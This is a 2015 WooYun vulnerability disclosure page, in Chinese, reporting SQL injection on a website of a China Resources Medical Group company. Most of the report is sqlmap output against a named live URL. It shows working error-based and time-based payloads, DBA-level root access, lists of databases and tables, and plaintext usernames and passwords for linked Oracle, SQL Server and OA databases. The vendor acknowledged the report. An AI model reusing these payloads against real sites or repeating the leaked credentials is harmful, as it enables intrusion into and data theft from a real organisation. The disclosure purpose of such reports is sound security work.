华润医疗集团某公司存在SQL注入漏洞 | wooyun-2015-0135845| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135845

漏洞标题：华润医疗集团某公司存在SQL注入漏洞

漏洞作者： XTT

提交时间：2015-08-21 14:58

修复时间：2015-10-09 11:30

公开时间：2015-10-09 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-21：细节已通知厂商并且等待厂商处理中
2015-08-25：厂商已经确认，细节仅向厂商公开
2015-09-04：细节向核心白帽子及相关领域专家公开
2015-09-14：细节向普通白帽子公开
2015-09-24：细节向实习白帽子公开
2015-10-09：细节向公众公开

简要描述：

SQL注入，DBA权限，暴漏内部其他数据库，泄露重要信息

详细说明：

注入点：http://www.hrxaey.com/do/jsarticle.php?fid=69&type=pic&rows=4&leng=22&iframeID=article_Pictopic

---
Parameter: rows (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rows (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
available databases [9]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] performance_schema
[*] TD_OA
[*] TD_OA_ARCHIVE
[*] TRAIN
[*] v7_soft
---
Parameter: rows (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
current user:    'root@127.0.0.1'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---

漏洞证明：

部分重要信息

---
Parameter: rows (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: crscell
[216 tables]
+-------------------------+
| crs_archive_reportstate |
| crs_autocode            |
| crs_chart               |
| crs_codeindex           |
| crs_codeitem            |
| crs_columnindex         |
| crs_database            |
| crs_datatrace           |
| crs_detailreadpriv      |
| crs_detailwritepriv     |
| crs_entrust             |
| crs_formulas            |
| crs_hyperlink           |
| crs_logiccheck          |
| crs_para                |
| crs_parsecache          |
| crs_pntpara             |
| crs_readstate           |
| crs_remind_log          |
| crs_repkind             |
| crs_report              |
| crs_reportbulletin      |
| crs_reportstate         |
| crs_synsign             |
| crs_tabledata158        |
| crs_tabledata159        |
+-------------------------+
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: crscell
Table: crs_database
[8 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| user   | varchar(50)      |
| db     | text             |
| dbtype | varchar(10)      |
| id     | int(10) unsigned |
| label  | tinytext         |
| port   | varchar(20)      |
| pwd    | varchar(50)      |
| server | tinytext         |
+--------+------------------+
暴漏企业关联数据库用户密码端口等信息：
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rows (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: crscell
Table: crs_database
[3 entries]
+--------+--------+--------+--------+---------+---------+-----------+
| user   | db     | dbtype | label  | port    | pwd     | server    |
+--------+--------+--------+--------+---------+---------+-----------+
| SYSTEM | HR     | 4      | Oracle | <blank> | 111111  | ORCL      |
| sa     | rlzy30 | 0      | rlzy   | 1433    | sa      | localhost |
| root   | TD_OA  | 3      | TD_OA  | 3336    | myoa888 | localhost |
+--------+--------+--------+--------+---------+---------+-----------+
---
Parameter: rows (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: mysql
Table: user
[42 columns]
+------------------------+------------------+
| Column                 | Type             |
+------------------------+------------------+
| User                   | char(16)         |
| Alter_priv             | enum('N','Y')    |
| Alter_routine_priv     | enum('N','Y')    |
| authentication_string  | text             |
| Create_priv            | enum('N','Y')    |
| Create_routine_priv    | enum('N','Y')    |
| Create_tablespace_priv | enum('N','Y')    |
| Create_tmp_table_priv  | enum('N','Y')    |
| Create_user_priv       | enum('N','Y')    |
| Create_view_priv       | enum('N','Y')    |
| Delete_priv            | enum('N','Y')    |
| Drop_priv              | enum('N','Y')    |
| Event_priv             | enum('N','Y')    |
| Execute_priv           | enum('N','Y')    |
| File_priv              | enum('N','Y')    |
| Grant_priv             | enum('N','Y')    |
| Host                   | char(60)         |
| Index_priv             | enum('N','Y')    |
| Insert_priv            | enum('N','Y')    |
| Lock_tables_priv       | enum('N','Y')    |
| max_connections        | int(11) unsigned |
| max_questions          | int(11) unsigned |
| max_updates            | int(11) unsigned |
| max_user_connections   | int(11) unsigned |
| Password               | char(41)         |
| plugin                 | char(64)         |
| Process_priv           | enum('N','Y')    |
| References_priv        | enum('N','Y')    |
| Reload_priv            | enum('N','Y')    |
| Repl_client_priv       | enum('N','Y')    |
| Repl_slave_priv        | enum('N','Y')    |
| Select_priv            | enum('N','Y')    |
| Show_db_priv           | enum('N','Y')    |
| Show_view_priv         | enum('N','Y')    |
| Shutdown_priv          | enum('N','Y')    |
| ssl_cipher             | blob             |
| ssl_type               | enum(            |
| Super_priv             | enum('N','Y')    |
| Trigger_priv           | enum('N','Y')    |
| Update_priv            | enum('N','Y')    |
| x509_issuer            | blob             |
| x509_subject           | blob             |
+------------------------+------------------+
---
Parameter: rows (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: td_oa
[469 tables]
+----------------------------+
| session                    |
| user                       |
| version                    |
| address                    |
| address_group              |
| affair                     |
| app_log                    |
| archive_tables             |
| attachment                 |
| attachment_edit            |
| attachment_module          |
| attachment_position        |
| attend_ask_duty            |
| attend_config              |
| attend_duty                |
| attend_duty_shift          |
| attend_evection            |
| attend_holiday             |
| attend_leave               |
| attend_leave_manager       |
| attend_machine             |
| attend_manager             |
| attend_out                 |
| attendance_overtime        |
| bbs_board                  |
| bbs_comment                |
+----------------------------+
重要信息还很多......就不再暴了
^_^还请厂商尽快修复，避免更多重要信息外漏~

修复方案：

版权声明：转载请注明来源 XTT@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-08-25 11:29

厂商回复：

感谢提交

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135845

漏洞标题：华润医疗集团某公司存在SQL注入漏洞

相关厂商：华润医疗集团有限公司

漏洞作者： XTT

提交时间：2015-08-21 14:58

修复时间：2015-10-09 11:30

公开时间：2015-10-09 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 XTT@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135845

漏洞标题：华润医疗集团某公司存在SQL注入漏洞

相关厂商：华润医疗集团有限公司

漏洞作者： XTT

提交时间：2015-08-21 14:58

修复时间：2015-10-09 11:30

公开时间：2015-10-09 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0135845"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 XTT@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：